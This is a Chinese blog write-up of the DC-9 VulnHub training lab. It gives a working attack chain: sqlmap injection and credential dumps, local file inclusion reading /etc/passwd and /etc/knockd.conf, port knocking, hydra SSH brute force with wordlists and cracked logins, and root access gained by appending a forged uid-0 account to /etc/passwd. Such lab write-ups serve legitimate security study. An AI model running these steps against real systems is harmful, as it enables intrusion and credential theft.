【CyberSecurityLearning 78】DC系列之DC-9渗透测试

最新推荐文章于 2024-02-26 20:02:32 发布
最新推荐文章于 2024-02-26 20:02:32 发布
阅读量843 收藏 3
点赞数
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/116720648
版权

目录

DC-9靶机渗透测试

1、信息收集

1.1 扫描开放的端口

1.2 访问WEB站点

2. SQL注入

3、admin登录后台

4、尝试文件包含

4.1 利用 LFI 查看 /etc/knockd.conf 文件内容

4.2 hydra 爆破用户名和密码

5. 登录SSH

6、提权

6.1 构造root权限用户

 

DC-9靶机渗透测试

实验环境:

kali IP:192.168.3.196/24
DC-9的MAC地址:00:50:56:34:52:EA(IP为192.18.3.198)

1、信息收集

1.1 扫描开放的端口

1.2 访问WEB站点

在 search 下表单输入内容提交发现跳转到 results.php 页面,抓包查看数据包

发现在 /results.php 进行了 POST 传参,参数为 search=1,尝试使用 sqlmap 进行爆数据

2. SQL注入

点击search,也就是在search.php页面中,输入Mary' and 1=1#Mary' and 1=2#,前者返回Mary的结果,后者为空,存在sql注入。

爆数据库:sqlmap -u http://192.168.3.198/results.php --data 'search=1' --dbs

注意--data 选项的用法

查看当前数据库:sqlmap -u http://192.168.3.198/results.php --data 'search=1' --current-db    (current database: 'Staff'

查看Staff数据库中的表:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "Staff" --tables(发现StaffDetails表和 Users表

查看Users中字段:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "Staff" -T "Users" --columns(对Password和Usename字段感兴趣

查看Password和Username字段内容:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "Staff" -T "Users" -C "Password|Username" --dump  (弹出的都选y否则爆出来的密码没解密)

 

Password:856f5de590ef37314e7c3bdf6f8a66dc (transorbital1)   

Username:admin      

解码后为admin:transorbital1

爆users数据库的表:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "users" --tables  (UserDetails)

查看UserDetails中字段:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "users" -T "UserDetails" --columns

查看password和username字段内容:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D "users" -T "UserDetails" -C "password" --dump

我太傻了,直接看表不就好了:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D users -T UserDetails --dump

查看Users表:sqlmap -u http://192.168.3.198/results.php --data 'search=1' -D Staff -T Users --dump

解码后为admin:transorbital1

3、admin登录后台

登入后发现有 File does not exist 字样,疑似有文件包含!!!

4、尝试文件包含

http://192.168.3.198/manage.php?file=../../../../../../etc/passwd

发现有本地文件包含(LFI)

然后接下来尝试看看有没有远程文件包含(RFI)

http://192.168.3.198/manage.php?file=http://192.168.3.90/yjh.php(在本地web根目录写一个yjh.php)

发现不允许远程文件包含!

接下来不知道怎么办了,看看大佬的思路是利用 LFI 查看 /etc/knockd.conf 文件内容

4.1 利用 LFI 查看 /etc/knockd.conf 文件内容

knockd.conf文件端口敲门服务,用于将服务器隐藏,也是这个原因让22端口给过滤了。(将ssh隐藏了起来)
利用文件包含来查看knockd.conf文件,获得自定义端口,然后逐个进行敲门,这样我们就能够开启ssh端口

knochd 服务:
在使用此服务时,他人访问你的端口会显示 close 状态,只有按照特定顺序(配置文件)访问规定端口后才会开放被访问的端口,依次访问特定端口后才会关闭被访问的端口

?file=../../../../../etc/knockd.conf

使用nmap:
nmap -p 7469,8475,9842 192.168.3.198
nmap -p 8475 192.168.3.198
nmap -p 9842 192.168.3.198

4.2 hydra 爆破用户名和密码

name.txt:

marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
admin

passwd.txt:

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
transorbital1

命令:hydra -L name.txt -P passwd.txt 192.168.3.198 ssh

[22][ssh] host: 192.168.3.198   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.3.198   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.3.198   login: janitor   password: Ilovepeepee

5. 登录SSH

一个一个登录看看,有没有什么有用的东西。

ssh janitor@192.168.3.198

进去看看

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

增加在pass.txt后重新进行爆破

发现新增加了一个用户:login: fredf   password: B4-Tru3-001

使用fredf登录ssh:ssh fredf@192.168.3.198

 

6、提权

思路1、sudo -l(查看有没有一些命令在执行期间有root权限标签没有密码保护——行不通!)

发现 /opt/devstuff/dist/test/test 可以无需密码以 root 权限执行

思路2、查看有没有一些具有suid权限的命令

find / -perm /4000 2>/dev/null

进入/opt/devstuff目录下,看到test.py文件

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

test.py的功能是把一个文件的内容写到另一个文件中

含义:可以看到该脚本是判断参数是否为 3 个,如果是 3 个,将第二个文件中内容读出,写到第三个文件末尾)
test目录可以root权限执行:
因为我们可以以 root 权限执行该脚本,所以我们尝试构造数据进行对 /etc/passwd 进行添加

6.1 构造root权限用户

openssl passwd -1 -salt toor 123456    #构造toor用户密码为123456的hash

$1$toor$9mBAQXqhpCXpTk7V6d/kI0

构造结果:toor:$1$toor$9mBAQXqhpCXpTk7V6d/kI0:0:0::/root:/bin/bash

复习:

root  :  x  :  0  :  0  :  root  :  /root  :  /bin/bash
HSP   :  x  :  500  :  500  :  :  /home/HSP  :   /bin/bash
字段1:用户名称
字段2:密码占位符
字段3:用户的uid (0表示超级用户,500-60000表示普通用户,1-499表示程序用户)程序用户不允许登录系统
字段4:基本组的gid(先有组才有用户,先建立组再建立用户)
字段5:用户信息记录字段(这个字段基本上废弃了)
字段6:用户的家目录
字段7:用户登录系统后使用的命令解释器

echo 'toor:$1$toor$9mBAQXqhpCXpTk7V6d/kI0:0:0::/root:/bin/bash'>/tmp/toor     #将其写入/tmp/toor文件中
cd /opt/devstuff/dist/test    #进入脚本路径
sudo ./test /tmp/toor /etc/passwd    #使用脚本
su toor    #切换用户

输入密码:123456

 

Wαff1ε
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场练习第十七天~vulnhub靶场之dc-9
qq_57976347的博客
02-16 828
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1439
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhub DC: 9
箭雨镜屋
05-04 604
渗透思路:nmap扫描----利用sql注入获得网站和系统的用户名密码----利用任意文件读取获得knock序列----hydra爆破系统用户和密码----/etc/passwd写入新用户提权
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 436
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 6342
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2790
DC-8靶机渗透测试详细教程
DC几个基础命令
热门推荐
WDWCSDN123的博客
03-27 3万+
create_clock clk -period 5 -waveform {0,2.5} 创建一个名为clk,周期为5ns,占空比为50%的时钟 set_dont_touch set_dont_touch_network 设置不希望被DC优化的模块,前者 对cell和net都可以使用,后者只能用于net set_clock_transition 设置时钟转换时间,指从时钟高电平的10%到达时钟高...
DC-9靶机渗透
qq_43462485的博客
11-03 2038
DC-9靶机渗透 攻击机:kali 192.168.80.130 目标机:dc-9 192.168.134 一、信息收集 1.使用arp-scan -l和nmap进行主机发现和端口信息收集,发现22端口被阻塞 2.whatweb收集一下cms指纹信息 3.访问web界面,找找找,发现search这个地方可以查询信息 这意味着与数据库产生交互,可能会有注入 4.这是一个post注入,查看源码发现跳转界面是results.php,表单name为search (可以直接通过bu...
渗透测试DC-9靶机
Ciyaso的博客
08-24 707
一、扫描获取靶机ip arp-scan -l 192.168.203.148 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.148 开放了22、80端口 2.Wappaloyzer 访问主页 Web服务器:Apache 2.4.38 3.dirb dirb http://192.168.203.148 没有什么可以利用的 三、分析网站 Display 这里向我们显示了所有的用户信息 Search这里可以通过输入姓或名,可以查询相应信息 Manage这里
vulnhub靶机DC-9渗透测试
Long_gone的博客
01-21 2406
一、信息收集 首先用netdiscover确定靶机IP: 确定靶机IP为:192.168.1.109后开始扫描它的端口开放情况: namp -sV -A -p 0-65535 1192.168.1.109 发现它只开放了22和80端口,发现ssh服务被过滤掉了,这就使我们用不了ssh服务,先不管它。然后先访问一下80端口: 是一个这样的页面,其中还有4个选项,依次点开以后并没有什么发现,但...
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2534
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
渗透测试学习之靶机DC-9
情感博主V
03-17 1698
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.146 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.146 web站点相关服务信息 目录信息 注:不要试着访问welcome.php、session.php和addrecord.php不然会直接跳到登录后的页面,但是并不能做...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值